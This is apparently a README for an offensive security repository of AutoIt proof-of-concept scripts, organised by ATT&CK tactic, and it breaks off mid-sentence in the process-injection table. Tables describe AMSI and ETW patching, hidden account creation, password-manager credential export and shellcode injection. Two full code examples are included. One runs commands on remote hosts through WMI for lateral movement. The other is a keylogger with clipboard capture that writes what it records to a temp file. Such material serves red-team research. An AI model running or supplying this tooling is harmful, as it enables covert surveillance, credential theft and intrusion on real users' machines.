
OffensiveAutoIt

Offensive tooling notes and experiments in AutoIt v3 (https://www.autoitscript.com/site/autoit/)

Why AutoIt?

  • There are plenty of examples online of AutoIt being used for malware development, but I could not find a general resource that security folk new to the language can use to explore its capabilities and nuances.
  • Ability to call external DLL and Windows API functions directly (DllCall / DllStruct).
  • Scripts can be run by the interpreter, AutoIt3.exe (a digitally signed binary), or compiled into standalone executables.
  • Simplifies UI automation and interaction: GUI creation, simulating keystrokes and mouse movements, manipulating windows and processes.
  • Very active community and countless user defined functions (UDFs).
  • I love byt3bl33d3r's OffensiveNim repo and wanted to have a go at developing and researching tradecraft in a language I wasn't familiar with.

OffensiveAutoIt scripts

The examples in this repo are purely PoCs; I've tested them, but not thoroughly. The scripts are intended to be compiled and run as standalone console executables, but that is not the only way they can be used (they also run unmodified under AutoIt3.exe).

Execution (TA0002)

| Script | Description | ATT&CK Reference |
| :------ | :---------- | :----------- |
| ExecutePowershell.au3 | Hosts the CLR, bypasses AMSI and executes PowerShell through an unmanaged runspace. More info available in this post. | T1059.001 |
| ExecuteAssembly.au3 | Hosts the CLR, patches AMSI and ETW and executes a .NET assembly from memory. NOTE: This script doesn't support assembly arguments at the moment (WIP). More info available in this post. | T1027.002<br>T1218 |
| MSScriptControl.au3 | Executes JScript and VBScript using the MSScriptControl COM object. Direct port of scriptcontrol_bin.nim by byt3bl33d3r. | T1059.007<br>T1059.005 |
| ExcelCOM.au3 | Executes shellcode using the Excel COM object and VBA macros. Direct port of excel_com_bin.nim by byt3bl33d3r. | T1059.005 |

Persistence (TA0003)

| Script | Description | ATT&CK Reference |
| :------ | :---------- | :----------- |
| NetUserAdd.au3 | Uses the NetUserAdd API to create a new computer/machine account. The account is hidden from the control panel and from the net user / wmic commands. Adapted from DoUCMe by Ben0xA. | T1136.001 |

Defense Evasion (TA0005)

| Script | Description | ATT&CK Reference |
| :------ | :---------- | :----------- |
| PatchAMSI.au3 | Bypasses AMSI by patching amsi.dll in the current process. | T1562.001 |
| PatchETW.au3 | Patches ETW out of the current process. | T1562.006 |

Credential Access (TA0006)

| Script | Description | ATT&CK Reference |
| :------ | :---------- | :----------- |
| MiniDump.au3 | Dumps process memory to a file on disk using the MiniDumpWriteDump API. | T1003.001 |
| KeePassCredExport-1.au3 | Exports credentials from an unlocked KeePass2 database to disk using UI automation and key presses. Reference blog post here. | T1555.005 |
| KeePassCredExport-2.au3 | Exports credentials from an unlocked KeePass2 database to disk using UI automation and key presses. Contains a user idle time check. Reference blog post here. | T1555.005 |
| BitwardenCredExport.au3 | Exports Bitwarden vault credentials to disk using UI automation and key presses. Requires Bitwarden's master password. Reference blog post here. | T1555.005 |
| 1PasswordCredExport.au3 | Exports 1Password vault credentials to disk using UI automation and key presses. Blocks user input and the display during extraction. Requires 1Password's master password and admin privileges on the target PC. Reference blog post here. | T1555.005 |

Discovery (TA0007)

| Script | Description | ATT&CK Reference |
| :------ | :---------- | :----------- |
| WMIEnum.au3 | Enumerates basic info about a Windows host using WMI. | T1047 |

Lateral Movement (TA0008)

| Script | Description | ATT&CK Reference |
| :------ | :---------- | :----------- |
| WMICommand.au3 | Executes a command on a remote computer using WMI. | T1047 |
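As an added example that serves both the Discovery (WMIEnum.au3) and Lateral Movement (WMICommand.au3) rows, and is not code from the OffensiveAutoIt repo: AutoIt drives WMI through the SWbem COM objects with ObjGet, the same way VBScript does. The helper names (`_WmiConnect`, `_WmiQuery`, `_WmiHostInfo`, `_WmiExec`) are mine. It assumes the caller is a local administrator on the target, that DCOM is reachable (TCP 135 plus the dynamic RPC range), and that "." names the local host.

```autoit
; Added example; not a script from the OffensiveAutoIt repo.
; Drives WMI through the SWbem COM objects: WQL discovery and remote
; command execution via Win32_Process.Create.

Global $g_iComErr = 0
Global $g_oComHandler = ObjEvent("AutoIt.Error", "_ComErrHandler")

; Without a handler an unhandled COM error terminates the script; this one
; records the HRESULT so the helpers below can fail gracefully.
Func _ComErrHandler($oErr)
    $g_iComErr = $oErr.number
    ConsoleWrite("! COM error 0x" & Hex($oErr.number, 8) & " at line " & $oErr.scriptline & ": " & $oErr.windescription & @CRLF)
EndFunc

Func _WmiConnect($sHost)
    $g_iComErr = 0
    ; AutoIt strings have no escape character, so "\\" is a literal UNC prefix.
    Local $oWmi = ObjGet("winmgmts:{impersonationLevel=impersonate}!\\" & $sHost & "\root\cimv2")
    If @error Or $g_iComErr Or Not IsObj($oWmi) Then Return SetError(1, $g_iComErr, 0)
    Return $oWmi
EndFunc

; Run a WQL query; returns an SWbemObjectSet, or 0 with @error set.
Func _WmiQuery($sHost, $sWql)
    Local $oWmi = _WmiConnect($sHost)
    If @error Then Return SetError(1, @extended, 0)
    Local $oSet = $oWmi.ExecQuery($sWql)
    If $g_iComErr Or Not IsObj($oSet) Then Return SetError(2, $g_iComErr, 0)
    Return $oSet
EndFunc

; Basic host facts: OS build, boot time, console user and domain role.
Func _WmiHostInfo($sHost = ".")
    Local $sOut = ""
    Local $oOs = _WmiQuery($sHost, "SELECT Caption, Version, LastBootUpTime FROM Win32_OperatingSystem")
    If @error Then Return SetError(@error, @extended, "")
    For $o In $oOs
        $sOut &= "OS        : " & $o.Caption & " " & $o.Version & @CRLF
        $sOut &= "Last boot : " & $o.LastBootUpTime & @CRLF
    Next
    Local $oCs = _WmiQuery($sHost, "SELECT Name, Domain, UserName, DomainRole FROM Win32_ComputerSystem")
    If @error Then Return SetError(@error, @extended, $sOut)
    For $o In $oCs
        $sOut &= "Host      : " & $o.Name & " (" & $o.Domain & ")" & @CRLF
        $sOut &= "User      : " & $o.UserName & @CRLF
        ; DomainRole: 0/1 workstation, 2/3 server, 4 backup DC, 5 primary DC
        $sOut &= "Role      : " & $o.DomainRole & @CRLF
    Next
    Return $sOut
EndFunc

; Spawn $sCmdLine on $sHost; returns the new PID, or 0 with @error set.
; On @error = 4, @extended is the Win32_Process.Create return code
; (2 access denied, 3 insufficient privilege, 8 unknown failure,
; 9 path not found, 21 invalid parameter).
; ExecMethod_ is used instead of calling Create() directly so that the
; ProcessId out-parameter comes back on the result object rather than
; through a ByRef argument, which AutoIt's COM layer does not support.
Func _WmiExec($sHost, $sCmdLine)
    Local $oWmi = _WmiConnect($sHost)
    If @error Then Return SetError(1, @extended, 0)
    Local $oClass = $oWmi.Get("Win32_Process")
    If $g_iComErr Or Not IsObj($oClass) Then Return SetError(2, $g_iComErr, 0)
    Local $oIn = $oClass.Methods_("Create").InParameters.SpawnInstance_()
    $oIn.CommandLine = $sCmdLine
    Local $oOut = $oClass.ExecMethod_("Create", $oIn)
    If $g_iComErr Or Not IsObj($oOut) Then Return SetError(3, $g_iComErr, 0)
    If $oOut.ReturnValue <> 0 Then Return SetError(4, $oOut.ReturnValue, 0)
    Return $oOut.ProcessId
EndFunc

; Usage: enumerate the local host, then spawn a command (the output path
; is on the target, so a fixed path is used rather than the local @TempDir).
ConsoleWrite(_WmiHostInfo(".") & @CRLF)
Local $iPid = _WmiExec(".", "cmd.exe /c whoami > C:\Windows\Temp\whoami.txt")
If $iPid Then
    ConsoleWrite("Spawned PID " & $iPid & @CRLF)
Else
    ConsoleWrite("Create failed: step " & @error & ", code " & @extended & @CRLF)
EndIf
```

Point `_WmiExec` at a hostname or IP instead of "." to use it for lateral movement; the process then starts under WmiPrvSE.exe on the target, so a parent-child chain of WmiPrvSE.exe spawning cmd.exe is the obvious detection artefact. Win32_Process.Create gives you no stdout, which is why the example redirects to a file on the target.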

Collection (TA0009)

| Script | Description | ATT&CK Reference |
| :------ | :---------- | :----------- |
| Keylogger.au3 | Logs a user's keystrokes using AutoIt's _IsPressed function (Misc.au3 UDF). | T1056.001 |
| ScreenCapture.au3 | Takes a screenshot and saves it in the user's temp directory. | T1113 |
| ClipboardMonitor.au3 | Periodically polls the clipboard for text and prints the content to stdout. | T1115 |
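An added example, not a script from the OffensiveAutoIt repo, showing the two polling techniques the Keylogger.au3 and ClipboardMonitor.au3 rows describe in one loop: key state sampled with `_IsPressed` from Misc.au3 (a GetAsyncKeyState wrapper) and clipboard changes detected with ClipGet. The function names (`_ClipChange`, `_PollKeys`, `_Collect`) are mine, and the key range is limited to digits and letters on purpose; modifiers, punctuation and keyboard layout are not handled.

```autoit
; Added example; not a script from the OffensiveAutoIt repo.
; One polling loop that captures keystrokes (virtual-key codes 0x30-0x5A,
; i.e. digits and letters) with _IsPressed and clipboard text with ClipGet,
; runs for $iSeconds and returns everything it collected as one string.
#include <Misc.au3>

; Returns new clipboard text, or "" when nothing changed or ClipGet failed.
; On failure @extended holds the ClipGet code (1 empty, 2 non-text, 3/4 cannot open).
Func _ClipChange(ByRef $sLast)
    Local $sNow = ClipGet()
    If @error Then Return SetExtended(@error, "")
    If $sNow = $sLast Then Return ""
    $sLast = $sNow
    Return $sNow
EndFunc

; One scan of the key range; returns the characters that went down since the
; previous poll. $aDown remembers held keys so each press is logged once,
; which is the edge a naive _IsPressed loop gets wrong (it repeats the key
; on every iteration while it is held).
Func _PollKeys(ByRef $aDown, $hUser32)
    Local $sHit = ""
    For $i = 0x30 To 0x5A
        If $i > 0x39 And $i < 0x41 Then ContinueLoop ; gap between '9' and 'A'
        Local $bPressed = _IsPressed(Hex($i, 2), $hUser32)
        If $bPressed And Not $aDown[$i] Then $sHit &= Chr($i)
        $aDown[$i] = $bPressed
    Next
    Return $sHit
EndFunc

Func _Collect($iSeconds, $iPollMs = 20)
    Local $hUser32 = DllOpen("user32.dll") ; one handle for the loop instead of a DllOpen per call
    Local $aDown[0x5B] ; indexed by virtual-key code; unused slots stay ""
    Local $sLastClip = ClipGet(), $sLog = ""
    Local $hTimer = TimerInit()
    While TimerDiff($hTimer) < $iSeconds * 1000
        Local $sKeys = _PollKeys($aDown, $hUser32)
        If $sKeys <> "" Then $sLog &= $sKeys
        Local $sClip = _ClipChange($sLastClip)
        If $sClip <> "" Then $sLog &= @CRLF & "[clip] " & $sClip & @CRLF
        Sleep($iPollMs)
    WEnd
    DllClose($hUser32)
    Return $sLog
EndFunc

; Usage: collect for 15 seconds, write to the temp directory and echo to stdout.
Local $sCaptured = _Collect(15)
FileWrite(@TempDir & "\collect.log", $sCaptured)
ConsoleWrite($sCaptured & @CRLF)
```

A 20 ms poll is fast enough to catch normal typing but will still miss very short key presses; a hook-based logger (SetWindowsHookEx with WH_KEYBOARD_LL) avoids that at the cost of being a far more visible API pattern. Note that ClipGet returns "" with @error 2 for non-text content such as images or file lists, so those changes are silently skipped here.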

Process Injection (T1055)

| Script | Description | ATT&CK Reference |
| :------ | :---------- | :----------- |
| DLLInjection.au3 | Injects a DLL file on disk into a remote process. | T1055.001 |
| CreateRemoteThread.au3 | Injects shellcode into a remote process using the CreateRemoteThread API. | T1055.002 |
| QueueUserAPC.au3 | Injects shellcode into a target executable us
